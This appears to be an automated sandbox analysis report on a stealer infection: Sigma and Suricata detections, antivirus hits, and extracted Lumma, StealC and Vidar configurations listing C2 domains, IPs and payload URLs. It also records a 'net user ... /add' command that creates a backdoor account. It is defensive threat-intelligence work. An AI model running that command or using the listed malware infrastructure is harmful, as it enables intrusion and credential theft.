Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: net user RDPUser_615fbfde V24hFLzx4jqu /add, CommandLine: net user RDPUser_615fbfde V24hFLzx4jqu /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user RDPUser_615fbfde V24hFLzx4jqu /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7380, ParentProcessName: cmd.exe, ProcessCommandLine: net user RDPUser_615fbfde V24hFLzx4jqu /add, ProcessId: 7420, ProcessName: net.exe

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6164, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 6484, ProcessName: net.exe

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6164, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 6484, ProcessName: net.exe

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:43.835800+0200	2028765	3	Unknown Traffic	192.168.2.5	49732	5.75.211.162	443	TCP
2024-09-27T00:15:45.059476+0200	2028765	3	Unknown Traffic	192.168.2.5	49733	5.75.211.162	443	TCP
2024-09-27T00:15:46.445166+0200	2028765	3	Unknown Traffic	192.168.2.5	49734	5.75.211.162	443	TCP
2024-09-27T00:15:47.812874+0200	2028765	3	Unknown Traffic	192.168.2.5	49735	5.75.211.162	443	TCP
2024-09-27T00:15:49.170784+0200	2028765	3	Unknown Traffic	192.168.2.5	49736	5.75.211.162	443	TCP
2024-09-27T00:15:50.746100+0200	2028765	3	Unknown Traffic	192.168.2.5	49737	5.75.211.162	443	TCP
2024-09-27T00:15:51.635237+0200	2028765	3	Unknown Traffic	192.168.2.5	49738	5.75.211.162	443	TCP
2024-09-27T00:15:55.078970+0200	2028765	3	Unknown Traffic	192.168.2.5	49739	5.75.211.162	443	TCP
2024-09-27T00:15:55.982279+0200	2028765	3	Unknown Traffic	192.168.2.5	49740	5.75.211.162	443	TCP
2024-09-27T00:15:57.073883+0200	2028765	3	Unknown Traffic	192.168.2.5	49742	5.75.211.162	443	TCP
2024-09-27T00:15:58.109335+0200	2028765	3	Unknown Traffic	192.168.2.5	49743	5.75.211.162	443	TCP
2024-09-27T00:15:59.819800+0200	2028765	3	Unknown Traffic	192.168.2.5	49744	5.75.211.162	443	TCP
2024-09-27T00:16:01.689288+0200	2028765	3	Unknown Traffic	192.168.2.5	49745	5.75.211.162	443	TCP
2024-09-27T00:16:03.359870+0200	2028765	3	Unknown Traffic	192.168.2.5	49746	5.75.211.162	443	TCP
2024-09-27T00:16:04.822663+0200	2028765	3	Unknown Traffic	192.168.2.5	49747	5.75.211.162	443	TCP
2024-09-27T00:16:06.089475+0200	2028765	3	Unknown Traffic	192.168.2.5	49748	5.75.211.162	443	TCP
2024-09-27T00:16:09.599830+0200	2028765	3	Unknown Traffic	192.168.2.5	49749	5.75.211.162	443	TCP
2024-09-27T00:16:10.997651+0200	2028765	3	Unknown Traffic	192.168.2.5	49750	5.75.211.162	443	TCP
2024-09-27T00:16:12.361487+0200	2028765	3	Unknown Traffic	192.168.2.5	49751	5.75.211.162	443	TCP
2024-09-27T00:16:13.770356+0200	2028765	3	Unknown Traffic	192.168.2.5	49752	5.75.211.162	443	TCP
2024-09-27T00:16:15.911355+0200	2028765	3	Unknown Traffic	192.168.2.5	49753	5.75.211.162	443	TCP
2024-09-27T00:16:17.926798+0200	2028765	3	Unknown Traffic	192.168.2.5	49754	5.75.211.162	443	TCP
2024-09-27T00:16:20.735945+0200	2028765	3	Unknown Traffic	192.168.2.5	49756	5.75.211.162	443	TCP
2024-09-27T00:16:22.900430+0200	2028765	3	Unknown Traffic	192.168.2.5	49759	5.75.211.162	443	TCP
2024-09-27T00:16:24.799809+0200	2028765	3	Unknown Traffic	192.168.2.5	49762	5.75.211.162	443	TCP
2024-09-27T00:16:26.440112+0200	2028765	3	Unknown Traffic	192.168.2.5	49765	5.75.211.162	443	TCP
2024-09-27T00:16:47.745387+0200	2028765	3	Unknown Traffic	192.168.2.5	49773	5.75.211.162	443	TCP
2024-09-27T00:16:49.032858+0200	2028765	3	Unknown Traffic	192.168.2.5	49774	5.75.211.162	443	TCP
2024-09-27T00:16:50.330687+0200	2028765	3	Unknown Traffic	192.168.2.5	49775	5.75.211.162	443	TCP
2024-09-27T00:16:51.699043+0200	2028765	3	Unknown Traffic	192.168.2.5	49776	5.75.211.162	443	TCP
2024-09-27T00:16:53.063283+0200	2028765	3	Unknown Traffic	192.168.2.5	49777	5.75.211.162	443	TCP
2024-09-27T00:16:54.509791+0200	2028765	3	Unknown Traffic	192.168.2.5	49778	5.75.211.162	443	TCP
2024-09-27T00:16:55.519404+0200	2028765	3	Unknown Traffic	192.168.2.5	49779	5.75.211.162	443	TCP
2024-09-27T00:16:58.589240+0200	2028765	3	Unknown Traffic	192.168.2.5	49780	5.75.211.162	443	TCP
2024-09-27T00:16:59.819449+0200	2028765	3	Unknown Traffic	192.168.2.5	49781	5.75.211.162	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:14.490721+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49710	172.67.194.216	443	TCP
2024-09-27T00:15:16.085743+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49712	104.21.4.136	443	TCP
2024-09-27T00:15:17.747671+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49714	188.114.96.3	443	TCP
2024-09-27T00:15:18.792727+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49716	188.114.97.3	443	TCP
2024-09-27T00:15:19.906123+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49719	188.114.96.3	443	TCP
2024-09-27T00:15:20.895417+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49721	104.21.58.182	443	TCP
2024-09-27T00:15:21.953640+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49722	188.114.97.3	443	TCP
2024-09-27T00:15:22.924014+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49724	188.114.96.3	443	TCP
2024-09-27T00:15:23.899861+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49725	172.67.208.139	443	TCP
2024-09-27T00:15:26.237055+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49727	172.67.128.144	443	TCP
2024-09-27T00:16:21.495636+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49757	172.67.194.216	443	TCP
2024-09-27T00:16:22.443413+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49758	104.21.4.136	443	TCP
2024-09-27T00:16:23.477186+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49760	188.114.96.3	443	TCP
2024-09-27T00:16:24.416856+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49761	188.114.97.3	443	TCP
2024-09-27T00:16:25.540444+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49763	188.114.96.3	443	TCP
2024-09-27T00:16:26.704771+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49764	104.21.58.182	443	TCP
2024-09-27T00:16:27.666864+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49766	188.114.97.3	443	TCP
2024-09-27T00:16:28.573022+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49768	188.114.96.3	443	TCP
2024-09-27T00:16:29.565402+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49769	172.67.208.139	443	TCP
2024-09-27T00:16:31.910257+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49771	172.67.128.144	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:14.490721+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49710	172.67.194.216	443	TCP
2024-09-27T00:15:16.085743+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49712	104.21.4.136	443	TCP
2024-09-27T00:15:17.747671+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49714	188.114.96.3	443	TCP
2024-09-27T00:15:18.792727+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49716	188.114.97.3	443	TCP
2024-09-27T00:15:19.906123+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49719	188.114.96.3	443	TCP
2024-09-27T00:15:20.895417+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49721	104.21.58.182	443	TCP
2024-09-27T00:15:21.953640+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49722	188.114.97.3	443	TCP
2024-09-27T00:15:22.924014+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49724	188.114.96.3	443	TCP
2024-09-27T00:15:23.899861+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49725	172.67.208.139	443	TCP
2024-09-27T00:15:26.237055+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49727	172.67.128.144	443	TCP
2024-09-27T00:16:21.495636+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49757	172.67.194.216	443	TCP
2024-09-27T00:16:22.443413+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49758	104.21.4.136	443	TCP
2024-09-27T00:16:23.477186+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49760	188.114.96.3	443	TCP
2024-09-27T00:16:24.416856+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49761	188.114.97.3	443	TCP
2024-09-27T00:16:25.540444+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49763	188.114.96.3	443	TCP
2024-09-27T00:16:26.704771+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49764	104.21.58.182	443	TCP
2024-09-27T00:16:27.666864+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49766	188.114.97.3	443	TCP
2024-09-27T00:16:28.573022+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49768	188.114.96.3	443	TCP
2024-09-27T00:16:29.565402+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49769	172.67.208.139	443	TCP
2024-09-27T00:16:31.910257+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49771	172.67.128.144	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:20.444639+0200	2056157	1	Domain Observed Used for C2 Detected	192.168.2.5	49721	104.21.58.182	443	TCP
2024-09-27T00:16:26.236407+0200	2056157	1	Domain Observed Used for C2 Detected	192.168.2.5	49764	104.21.58.182	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:21.453448+0200	2056155	1	Domain Observed Used for C2 Detected	192.168.2.5	49722	188.114.97.3	443	TCP
2024-09-27T00:16:27.198987+0200	2056155	1	Domain Observed Used for C2 Detected	192.168.2.5	49766	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:16.669472+0200	2056163	1	Domain Observed Used for C2 Detected	192.168.2.5	49714	188.114.96.3	443	TCP
2024-09-27T00:16:23.007268+0200	2056163	1	Domain Observed Used for C2 Detected	192.168.2.5	49760	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:15.015563+0200	2056165	1	Domain Observed Used for C2 Detected	192.168.2.5	49712	104.21.4.136	443	TCP
2024-09-27T00:16:21.966314+0200	2056165	1	Domain Observed Used for C2 Detected	192.168.2.5	49758	104.21.4.136	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:18.261259+0200	2056161	1	Domain Observed Used for C2 Detected	192.168.2.5	49716	188.114.97.3	443	TCP
2024-09-27T00:16:23.948549+0200	2056161	1	Domain Observed Used for C2 Detected	192.168.2.5	49761	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:23.483992+0200	2056151	1	Domain Observed Used for C2 Detected	192.168.2.5	49725	172.67.208.139	443	TCP
2024-09-27T00:16:29.128963+0200	2056151	1	Domain Observed Used for C2 Detected	192.168.2.5	49769	172.67.208.139	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:22.464884+0200	2056153	1	Domain Observed Used for C2 Detected	192.168.2.5	49724	188.114.96.3	443	TCP
2024-09-27T00:16:28.147477+0200	2056153	1	Domain Observed Used for C2 Detected	192.168.2.5	49768	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:19.455986+0200	2056159	1	Domain Observed Used for C2 Detected	192.168.2.5	49719	188.114.96.3	443	TCP
2024-09-27T00:16:24.886227+0200	2056159	1	Domain Observed Used for C2 Detected	192.168.2.5	49763	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:13.331398+0200	2056177	1	Domain Observed Used for C2 Detected	192.168.2.5	49710	172.67.194.216	443	TCP
2024-09-27T00:16:20.999843+0200	2056177	1	Domain Observed Used for C2 Detected	192.168.2.5	49757	172.67.194.216	443	TCP

ET MALWARE Vidar Stealer Form Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:16:27.924182+0200	2054495	1	A Network Trojan was detected	192.168.2.5	49767	45.132.206.251	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:19.914703+0200	2056156	1	Domain Observed Used for C2 Detected	192.168.2.5	55707	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:20.900909+0200	2056154	1	Domain Observed Used for C2 Detected	192.168.2.5	52777	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:16.092335+0200	2056162	1	Domain Observed Used for C2 Detected	192.168.2.5	51313	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:14.499344+0200	2056164	1	Domain Observed Used for C2 Detected	192.168.2.5	49333	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:17.776661+0200	2056160	1	Domain Observed Used for C2 Detected	192.168.2.5	58362	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:22.958632+0200	2056150	1	Domain Observed Used for C2 Detected	192.168.2.5	62199	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:21.957164+0200	2056152	1	Domain Observed Used for C2 Detected	192.168.2.5	62251	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:18.933647+0200	2056158	1	Domain Observed Used for C2 Detected	192.168.2.5	58673	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:12.812499+0200	2056176	1	Domain Observed Used for C2 Detected	192.168.2.5	60401	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:14:59.371818+0200	2044245	1	Malware Command and Control Activity Detected	46.8.231.109	80	192.168.2.5	49708	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:14:59.363926+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.5	49708	46.8.231.109	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:14:59.543492+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.5	49708	46.8.231.109	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:14:59.939795+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.5	49708	46.8.231.109	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:14:59.553925+0200	2044247	1	Malware Command and Control Activity Detected	46.8.231.109	80	192.168.2.5	49708	TCP
2024-09-27T00:15:48.512651+0200	2044247	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.5	49735	TCP
2024-09-27T00:16:52.396392+0200	2044247	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.5	49776	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:49.880938+0200	2051831	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.5	49736	TCP
2024-09-27T00:16:53.765601+0200	2051831	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.5	49777	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:47.152507+0200	2049087	1	A Network Trojan was detected	192.168.2.5	49734	5.75.211.162	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:14:59.184301+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49708	46.8.231.109	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:36.905688+0200	2803305	3	Unknown Traffic	192.168.2.5	49728	104.26.13.205	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:00.117427+0200	2803304	3	Unknown Traffic	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:15:03.529767+0200	2803304	3	Unknown Traffic	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:15:04.335460+0200	2803304	3	Unknown Traffic	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:15:05.818930+0200	2803304	3	Unknown Traffic	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:15:06.370963+0200	2803304	3	Unknown Traffic	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:15:07.947759+0200	2803304	3	Unknown Traffic	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:15:08.327617+0200	2803304	3	Unknown Traffic	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:15:10.214529+0200	2803304	3	Unknown Traffic	192.168.2.5	49709	147.45.44.104	80	TCP
2024-09-27T00:15:11.474575+0200	2803304	3	Unknown Traffic	192.168.2.5	49709	147.45.44.104	80	TCP
2024-09-27T00:15:11.983773+0200	2803304	3	Unknown Traffic	192.168.2.5	49709	147.45.44.104	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:16:19.368952+0200	2803270	2	Potentially Bad Traffic	192.168.2.5	49755	147.45.44.104	80	TCP
2024-09-27T00:16:21.874790+0200	2803270	2	Potentially Bad Traffic	192.168.2.5	49755	147.45.44.104	80	TCP
2024-09-27T00:16:24.031613+0200	2803270	2	Potentially Bad Traffic	192.168.2.5	49755	147.45.44.104	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: stogeneratmns.shop	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/api	Avira URL Cloud: Label: malware
Source: wallkedsleeoi.shop	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpHTe	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/nss3.dlL	Avira URL Cloud: Label: malware
Source: offensivedzvju.shop	Avira URL Cloud: Label: malware
Source: fragnantbui.shop	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/DBAAF	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/x	Avira URL Cloud: Label: malware
Source: https://offensivedzvju.shop/	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/apii	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll8	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869/inventory/	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869	Avira URL Cloud: Label: malware
Source: https://wallkedsleeoi.shop/api1	Avira URL Cloud: Label: malware
Source: https://stogeneratmns.shop/apiT	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/	Avira URL Cloud: Label: malware
Source: http://147.45.44.104	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.php32	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5d9ab0d4c7_rdp.exe0	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dllj	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/e	Avira URL Cloud: Label: malware
Source: https://stogeneratmns.shop/api	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll4	Avira URL Cloud: Label: malware
Source: https://ghostreedmnu.shop/api	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.php	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll0	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpnu	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/pet_	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\ProgramData\GIEBGIIJDG.exe	Avira: detection malicious, Label: HEUR/AGEN.1311769
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\66f5d9ab0d4c7_rdp[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1311769
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\66f5d9ab0d4c7_rdp[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1311769
Source: C:\Users\userBGIJEGCGDG.exe	Avira: detection malicious, Label: HEUR/AGEN.1311769

Found malware configuration

Source: 00000007.00000002.2211440894.0000000003945000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "e90840a846d017e7b095f7543cdf2d15"}
Source: 0.2.file.exe.3a65570.0.raw.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://46.8.231.109/c4754d4f680ead72.php", "Botnet": "default"}
Source: 17.2.RegAsm.exe.400000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["offensivedzvju.shop", "fragnantbui.shop", "reinforcenh.shop", "wallkedsleeoi.shop", "gutterydhowi.shop", "drawzhotdog.shop", "vozmeatillu.shop", "ghostreedmnu.shop", "stogeneratmns.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\RDP Wrapper\rdpwrap.dll	ReversingLabs: Detection: 54%
Source: C:\ProgramData\BKJJEBKKEH.exe	ReversingLabs: Detection: 42%
Source: C:\Users\userAFHDHCAAKE.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\66f5db9e54794_vfkagks[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\66f5db9e54794_vfkagks[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\GIEBGIIJDG.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\66f5d9ab0d4c7_rdp[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\66f5d9ab0d4c7_rdp[1].exe	Joe Sandbox ML: detected
Source: C:\Users\userBGIJEGCGDG.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: reinforcenh.shop
Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stogeneratmns.shop
Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fragnantbui.shop
Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: vozmeatillu.shop
